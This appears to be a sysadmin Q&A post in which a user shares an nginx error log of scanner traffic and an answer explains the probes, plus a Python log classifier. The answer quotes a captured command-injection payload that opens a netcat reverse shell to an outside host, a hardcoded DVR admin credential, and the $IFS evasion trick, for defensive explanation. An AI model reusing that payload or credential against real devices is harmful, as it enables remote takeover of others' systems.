By looking at the nginx error log, is my server under attack?
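This is part of the nginx error log on Ubuntu 18.04. My nodejs server has constant HTTP requests. My question is whether the server is under attack? I looked it up online, and 52.69.23.0/255.255.255.0 is a block out of Tokyo, Japan.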
2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
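Any server connected to the public internet will come under attack to some degree, even if it is not vulnerable. Internet-wide vulnerability scans will find their way to you. The traffic indicates PHP scanning and some other interesting traffic that has recently been showing up on my IPS:
Host 93.174.93[.]178 sends an HTTP POST request to the destination URL "editBlackAndWhiteList", using Base64-encoded credentials: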
admin:{12213BD1-69C7-4862-843D-260500D1DA40}
XML payload:
refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)
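IFS stands for "internal field separator". The shell uses it to determine how to do word splitting. The default value of IFS consists of whitespace characters (space, tab and newline). $IFS or ${IFS} is commonly used in command injection in place of whitespace. For many command-line interpreters ("shells") of Unix operating systems, the internal field separator is a variable that defines the characters used to separate a pattern into tokens for some operations.
$(nc 93.174.93[.]178 31337 -e $SHELL&) – Netcat reverse shell to host 93.174.93[.]178 on port 31337.
Fortinet has an IPS signature for this traffic, "HTTP.Unix.Shell.IFS.Remote.Code.Execution." It indicates detection of a suspicious HTTP request that uses the internal field separator.
https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution
Snort IPS flags this traffic under the signature "ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted."
The host is attempting to obtain a reverse shell by exploiting a remote code execution vulnerability in the Shenzhen TVT Digital Technology Co. Ltd and OEM {DVR/NVR/IPC} API via the hard-coded 'admin' web GUI password. There are six POCs on GitHub: https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
It would be wise to set up an IPS in front of your web server.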
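An added example, not part of the original question or answer: Python that parses nginx error-log lines in the format shown in the question, labels each request with the kind of probe the answer describes, and flags clients that sweep many missing paths in a short burst. The category names, the 10-second window and the 5-path threshold are assumptions chosen for illustration; the sample lines are copied from the log in the question.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Layout of an nginx error-log entry as it appears in the question.
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<level>\w+)\] '
    r'\d+#\d+: \*(?P<conn>\d+) (?P<msg>.*?), client: (?P<client>[0-9a-fA-F.:]+), '
    r'server: (?P<server>[^,]+), '
    r'request: "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')

def parse_line(line):
    """Return the parsed fields, or None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # e.g. the Passenger "Security update check failed" lines
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y/%m/%d %H:%M:%S")
    return rec

def classify(method, target):
    """Label one request line; the label names are assumptions of this example."""
    decoded = unquote(target)
    path = decoded.split("?", 1)[0].lower()
    # $IFS / ${IFS} standing in for whitespace inside the request target.
    if re.search(r"\$(\{IFS\}|IFS\b)", decoded):
        return "ifs-command-injection"
    # Absolute-URI target: the client is testing whether we relay as a proxy.
    if re.match(r"https?://", decoded, re.I):
        return "proxy-probe"
    # The error log records only the request line, not the POST body, so the
    # DVR/NVR API probe from the answer is recognised by its path.
    if path.endswith("/editblackandwhitelist"):
        return "tvt-dvr-api-probe"
    if path.endswith(".php"):
        return "php-scan"
    if path == "/":
        return "root-index"
    return "other"

def _is_sweep(events, window_s, min_paths):
    """True if min_paths distinct missing paths fall inside one time window."""
    events = sorted(events)
    span = timedelta(seconds=window_s)
    for i, (start, _) in enumerate(events):
        paths = {t for ts, t in events[i:] if ts - start <= span}
        if len(paths) >= min_paths:
            return True
    return False

def summarize(lines, window_s=10, min_paths=5):
    """Per client: request counts by category and whether it ran a path sweep."""
    per_client = defaultdict(lambda: {"categories": Counter(), "missing": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_client[rec["client"]]
        entry["categories"][classify(rec["method"], rec["target"])] += 1
        if "No such file or directory" in rec["msg"]:
            entry["missing"].append((rec["ts"], rec["target"]))
    return {
        client: {"categories": dict(e["categories"]),
                 "sweep": _is_sweep(e["missing"], window_s, min_paths)}
        for client, e in per_client.items()
    }

# Sample input: lines copied from the log in the question.
SAMPLE_LOG = '''
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
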